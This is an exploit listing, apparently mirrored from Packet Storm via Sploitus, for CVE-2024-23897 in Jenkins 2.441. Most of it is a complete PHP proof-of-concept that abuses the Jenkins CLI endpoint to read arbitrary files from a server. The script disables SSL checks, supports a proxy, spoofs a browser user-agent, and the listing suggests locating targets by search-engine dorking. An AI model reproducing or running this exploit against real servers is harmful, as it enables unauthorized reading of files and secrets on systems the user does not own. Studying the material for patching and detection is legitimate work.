Share
## https://sploitus.com/exploit?id=PACKETSTORM:212953
=============================================================================================================================================
    | # Title     : Jenkins 2.441 read files Vulnerability                                                                                      |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://www.jenkins.io/changelog/2.441/                                                                                     |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: read files in Jenkins
    
       (Related : https://packetstorm.news/files/id/188696/ Related CVE numbers: CVE-2024-23897 ) .
    	
    [+] save code as poc.php.
    
    [+] Usage: php script.php -u <Jenkins URL> -f <file path> [-p <proxy>]
    
    [+] PayLoad :
    
    
    <?php
    
    // تعطيل تحذيرات SSL للشهادات الذاتية التوقيع
    stream_context_set_default([
        'ssl' => [
            'verify_peer' => false,
            'verify_peer_name' => false,
        ]
    ]);
    
    // تعريف الثوابت للألوان في الإخراج
    const RED = "\033[91m";
    const GREEN = "\033[92m";
    const YELLOW = "\033[93m";
    const ENDC = "\033[0m";
    const ENCODING = "UTF-8";
    
    // دالة لإنشاء بيانات الطلب لجينكينز
    function jenkins_arg($string, $operation) {
        $out_bytes = "\x00\x00";
        $out_bytes .= pack("n", strlen($string) + 2);
        $out_bytes .= chr($operation);
        $out_bytes .= pack("n", strlen($string));
        $out_bytes .= $string;
        return $out_bytes;
    }
    
    // دالة لإرسال طلب تحميل الملف
    function send_upload_request($url, $uuid_str, $file_path, $useragent, $proxy) {
        usleep(300000);
    
        $data = jenkins_arg("connect-node", 0) . jenkins_arg("@" . $file_path, 0) . jenkins_arg(ENCODING, 2) . jenkins_arg("en", 1) . jenkins_arg("", 3);
        
        $opts = [
            'http' => [
                'method' => 'POST',
                'header' => [
                    "User-Agent: $useragent",
                    "Session: $uuid_str",
                    "Side: upload",
                    "Content-type: application/octet-stream"
                ],
                'content' => $data,
                'timeout' => 3
            ]
        ];
        if ($proxy) {
            $opts['http']['proxy'] = $proxy;
            $opts['http']['request_fulluri'] = true;
        }
    
        $context = stream_context_create($opts);
        @file_get_contents($url . "/cli?remoting=false", false, $context);
    }
    
    // دالة لإرسال طلب تنزيل الملف
    function send_download_request($url, $uuid_str, $useragent, $proxy) {
        $opts = [
            'http' => [
                'method' => 'POST',
                'header' => [
                    "User-Agent: $useragent",
                    "Session: $uuid_str",
                    "Side: download"
                ],
                'timeout' => 3
            ]
        ];
        if ($proxy) {
            $opts['http']['proxy'] = $proxy;
            $opts['http']['request_fulluri'] = true;
        }
    
        $context = stream_context_create($opts);
        $response = @file_get_contents($url . "/cli?remoting=false", false, $context);
    
        if (strpos($response, "No such file:") !== false) {
            echo "File does not exist\n";
            return false;
        }
        if (strpos($response, "No such agent") !== false) {
            preg_match_all('/No such agent \"(.*?)\"/', $response, $matches);
            return isset($matches[1]) ? implode("\n", $matches[1]) : "";
        }
    
        return trim(str_replace("\x00", "\n", $response));
    }
    
    // دالة لقراءة الملف عبر Jenkins
    function read_file($url, $file_path, $useragent, $proxy) {
        $uuid_str = uniqid();
        
        send_upload_request($url, $uuid_str, $file_path, $useragent, $proxy);
        
        $file_contents = send_download_request($url, $uuid_str, $useragent, $proxy);
        if ($file_contents) {
            echo $file_contents . "\n";
        } else {
            echo "<empty>\n";
        }
    }
    
    // تنفيذ الكود
    $options = getopt("u:f:p:", ["url:", "file:", "proxy:"]);
    $url = $options['u'] ?? $options['url'] ?? '';
    $file = $options['f'] ?? $options['file'] ?? '';
    $proxy = $options['p'] ?? $options['proxy'] ?? '';
    $useragent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36";
    
    if (!$url || !$file) {
        exit("Usage: php script.php -u <Jenkins URL> -f <file path> [-p <proxy>]\n");
    }
    
    read_file($url, $file, $useragent, $proxy);
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================